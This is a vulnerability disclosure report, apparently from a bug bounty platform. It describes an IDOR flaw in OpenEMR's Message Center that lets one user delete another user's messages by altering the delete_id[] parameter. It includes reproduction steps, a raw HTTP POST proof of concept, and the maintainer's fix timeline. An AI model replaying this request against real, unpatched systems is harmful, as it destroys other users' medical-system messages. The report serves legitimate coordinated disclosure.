We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

IDOR leads to delete messages in Message Center of others. in openemr/openemr

Valid

Reported on

Aug 2nd 2022

Description

I observed that users can delete messages in other's Message Center by changing delete_id parameter to delete_id value of message which belongs to other.

Step:

  • Login with Physician account and determine delete_id[] of messages in Physician's Message Center
  • Login with Clinician account.
  • Go to Clinician 's Message Center, delete a message in Message Center and use Burpsuite to intercept this request.
  • Modify delete_id[] to delete_id[] of message which belongs to Physician's Message Center.
  • Message with corresponding delete_id[] in Physicican's Message Center will be deleted.

Proof of Concept

POST /openemr/interface/main/messages/messages.php?showall=&sortby=pnotes.date&sortorder=desc&begin=0&form_active=1 HTTP/1.1
Host: demo.openemr.io
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.openemr.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://demo.openemr.io/openemr/interface/main/messages/messages.php?form_active=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OpenEMR=F%2CirXOlXHBMtyJUilGMZ0%2C9PvCyhZXGdzItmkF7g5BnT8pyP
Connection: close

task=delete&delete_id%5B%5D=7

Impact

Attacker can delete messages of in Message Center of any user. Victim may not see any message from other.

We are processing your report and will contact the openemr team within 24 hours. a year ago
Lê Thị Mỹ Duyên modified the report
a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
We have sent a follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller validated this vulnerability a year ago

Thanks for the fix. A preliminary fix has been posted in commit 9c430413101ab170c83ab4aa2d880ecdc170e815

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 1-3 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

Lê Thị Mỹ Duyên has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
a year ago

Maintainer

to clarify above comment, meant to initially state "Thanks for the report!"

Brady Miller marked this as fixed in 7.0.0.1 with commit 9c4304 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller
a year ago

Maintainer

OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

to join this conversation